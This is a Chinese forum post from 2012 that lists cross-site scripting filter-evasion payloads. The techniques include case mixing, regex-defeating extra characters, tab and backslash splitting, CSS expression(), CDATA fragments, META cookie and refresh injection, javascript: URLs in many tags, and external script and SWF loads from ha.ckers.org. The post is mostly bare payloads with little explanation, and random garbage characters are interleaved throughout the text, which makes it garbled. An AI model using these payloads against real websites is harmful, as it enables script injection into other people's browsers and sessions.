1. 改变字符大小写
) Z, n" S( ?( f+ A$ n3 t$ b9 w8 j S# H2 I
! ?4 C( U7 {3 T- a( E. r4 K" B( w+ k/ U* p
<sCript>alert(‘d’)</scRipT>+ B! H: R; o2 n+ Q! O: Q
) e: E Z0 ^' P7 v$ o9 h0 u2. 利用多加一些其它字符来规避Regular Expression的检查
. \; f( u5 P$ ^* r2 G8 |, z
0 p, H; p7 B# L9 _* F! g <<script>alert(‘c’)//<</script>, N2 z0 {4 ?4 W3 a
/ q. ^4 C/ e' f0 C: ]" c
<SCRIPT a=">" SRC="t.js"></SCRIPT>
+ b X5 [2 ]0 N. n2 a* ]5 h$ Z
/ K* q8 q% g5 o5 @ t8 ~ <SCRIPT =">" SRC="t.js"></SCRIPT>
! e: e' I1 W2 ^9 F/ T6 F4 W# q1 j
0 w% k- a( h e! f; |* B <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
# r" M' h' U7 D3 Q/ D
! X" c6 h$ y2 u* N0 O3 o5 R8 k <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
) r* e, }% _; _- E" V; c( N. M* O0 f& O( U! J" p* h! V
<SCRIPT a=`>` SRC="t.js"></SCRIPT>5 ^& R8 |4 K& I0 ~
( t5 P7 n( K5 P% M1 v: ?- \9 F3 Q5 J) G
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
, H9 {0 Q8 u" s, g5 Q5 s8 ^
O- p! e9 I' G3. 以其它扩展名取代.js$ b( n, @) t, a7 ]7 j: X
# ]: O# z4 ]4 v <script src="bad.jpg"></script>
- X, B3 D( h, h7 K5 R1 z! h* h ]- n# m. ^ a, c" ?
4. 将Javascript写在CSS档里) f; T/ n) L: N0 ]
- ~' a0 C6 x2 i L$ }
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">0 Z& ]/ `$ k- J( ~8 N
+ W3 J2 A/ U3 [$ v, ~0 r example:) ?/ J/ D; B Y8 K
2 m" _! `, N5 k% r* v
body {3 K; h: [- Q8 W* P* U) o
" n7 ~9 K R' H6 z9 R% [ background-image: url(‘javascript:alert("XSS");’)/ T, l3 H$ }! a: M L5 _0 X2 g
4 _; b8 d& Z3 R1 p" D4 E
}+ M z3 s) m* w9 i1 C2 t1 z
+ _4 L& x6 D. L8 x' \( q6 N$ C
5. 在script的tag里加入一些其它字符
6 C# s. D/ e/ _8 G4 g6 @! C
+ r/ A8 s4 O% A3 a6 _ <SCRIPT/SRC="t.js"></SCRIPT>2 M. Z# H$ E5 i( Q& h
3 B; m9 ?# N8 \3 f
<SCRIPT/anyword SRC="t.js"></SCRIPT>
7 _5 t; {9 `" k
; B" l7 s" H( m8 r. b6. 使用tab或是new line来规避
( g+ o3 w" S0 D( e) |3 b+ m: w5 S, G; H2 M: U
<img src="jav ascr ipt:alert(‘XSS3′)">
& q0 |& q: o6 ]" a7 P' S
- g( L! T2 n( u, ?. j8 d <img src="jav ascr ipt:alert(‘XSS3′)">
" z* j) {- J; i; `: }5 M4 T
; a4 X+ K6 `( h" ?2 G <IMG SRC="jav ascript:alert(‘XSS’);"> t( R% T6 [4 b4 \) ^5 w& n
: _& N1 k" I( a, h -> tag
4 ]6 P. l) Q/ h0 I1 k$ E
& l; M- @2 z" F2 N2 ~ -> new line
1 q8 p0 K5 C' x w
, k2 W6 a: B5 l. g% P9 a7. 使用"\"来规避: Y! [7 b. L7 S8 D2 p; r6 n7 B6 t
, Y/ w9 k# [, O$ Q1 w1 s8 d
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
6 K4 A4 {& ^6 V. ]; S+ B$ w3 b' n5 @
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
) I& W* b4 P! M( Y
3 b3 p: }4 C' ? <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">3 P4 o" X D0 M' X
8 q( M" |# |$ C; [$ I <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
9 M6 B+ a' U, W8 \
" r# `. h3 |& R( E <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>' h! ]) b8 i& Z/ ?# J9 j
2 h- f" U. ?) r' _) W1 T9 p+ H
8. 使用Hex encode来规避(也可能会把";"拿掉)/ ?+ \! z: i1 u$ R* C q2 f
+ |% D& b: i2 l6 M* C' y2 c/ | <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
2 d" L. K2 B# y5 X6 `* K) o4 I
5 r& y; ]3 i2 P% e# M5 C 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
/ _: _0 W- z) ]
- G( ^1 c9 n- f% c8 q4 A' x/ P <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
& e0 ?2 w J4 Z, j; K: O. c. }9 z: A& E6 N. u" Y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">$ l1 S# H3 A3 V
, S5 s- X6 ?/ N/ z
9. script in HTML tag. M4 P& d2 y: }* ~" @( e
& ^4 p- H* Y7 ]4 N: c
<body onload=」alert(‘onload’)」>
, Y" Y4 |' O/ _# ~5 \3 [4 F( q' I- H2 R2 s# V, M* e& J
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload' d3 d5 [5 A6 e
2 ?, S' Y1 ?0 d10. 在swf里含有xss的code! ^% \5 ?& V5 N5 A& ?7 _5 M
: u" S9 D# N- M+ C: H
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
7 z( {$ A1 E9 S, w4 C* l W S/ z
! _9 F6 v2 O. l2 J( b' K11. 利用CDATA将xss的code拆开,再组合起来。6 C0 V: S& ?$ {( H/ V1 R' a0 x
0 U) c, Q6 a% E8 D8 u
<XML ID=I><X><C>, Z) x9 w+ ?! o4 q8 `5 Z, a
9 x. h6 F9 o8 _% r <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
% w5 e2 a7 [8 Y5 r$ B
' O* H$ S* W3 w1 V2 y </C></X>, K# w% q. J- q
* k `+ H2 I) Z# r </xml>8 K$ j+ k @7 W; o7 y
" K* Y% }3 o8 b3 T) c. o <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ Y- ]& Q1 Q7 W# m3 k
3 y0 l; D- v8 [3 U
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>3 F, i* I: d) |) O0 I0 w- ^, T
% R( U4 P' J4 G% n9 m+ d) G
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>1 s4 r2 t4 ?+ C7 D4 j) y4 } _
" F# _; B* k- B' p. ?12. 利用HTML+TIME。
$ k% v; N. U* _ v! g' o
4 D2 e3 U' K6 S( }8 d: x1 E# S <HTML><BODY> R/ P' Q6 V9 d7 e( V+ d' e, Y9 e
2 ?0 _9 |: w/ n4 u' k( ~
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">3 j9 N0 Q$ x' t2 M+ P# z9 e
; \; d: z" ^& \3 ?3 b8 u <?import namespace="t" implementation="#default#time2">9 O7 Q/ `, Y/ a# X& V
[+ C/ m1 k: b5 L; @) z; S3 W; N <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">& Z6 l$ Z. }, ]& C3 A" L
: M/ H* H0 F: E </BODY></HTML>( P7 S" e% D$ O1 C
7 V3 J3 R; y" l2 p$ t- \
13. 透过META写入Cookie。- O+ @' \6 c' S) L7 K/ s
, h# ?0 q$ l# W5 \ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
5 d: [! Q" y2 o
7 |( J# |; y' \% |0 W14. javascript in src , href , url9 E: g) M9 h# Z7 N$ J
5 K* q" h6 R: [( Y <IFRAME SRC=javascript:alert(’13′)></IFRAME>
# _3 |9 G1 e4 u2 t3 V! H
$ t7 K# n7 q& n' q <img src="javascript:alert(‘XSS3′)">
# Z& |+ P7 \# P, b: h0 F: S+ x7 O; l7 R2 f9 A8 X& t- b
<IMG DYNSRC="javascript:alert(‘XSS20′)">6 ?" L2 b9 H9 z" v0 t8 E
% q) O/ f7 z* b Z C# H. [ <IMG LOWSRC="javascript:alert(‘XSS21′)">; X+ ^8 U1 c2 W, b( l C
0 ]! I! L! ~# j: \) Z! G
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
& i( J5 p% k$ _# k: U! w: [ l2 C0 ?; |2 a# ?2 L- T
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>) N9 z4 p! {# K( H# ?/ ^
x, I9 D0 o# d/ F4 M/ F$ f' h
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
- g6 c) x. r/ P+ Q# |2 _" O% L1 }* E. C0 ^% y. u
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
+ A& L2 p4 I9 u7 ]7 _' z' Q8 F: |0 C# D5 [9 i
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}$ c5 x% d* k$ d" ^5 |- t8 p# w: c
; ]6 t, ], ?$ F
</STYLE><A CLASS=XSS></A>
/ C2 ?1 \ M. P' r" p5 ^; x0 T' `8 T9 X2 z( t" l9 R' Y
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
0 E; T$ C) q2 s5 T' c+ E* n- x
8 K- u8 K7 v- j+ } |
发表于 2012-12-31 09:59:28
收藏
分享
支持
反对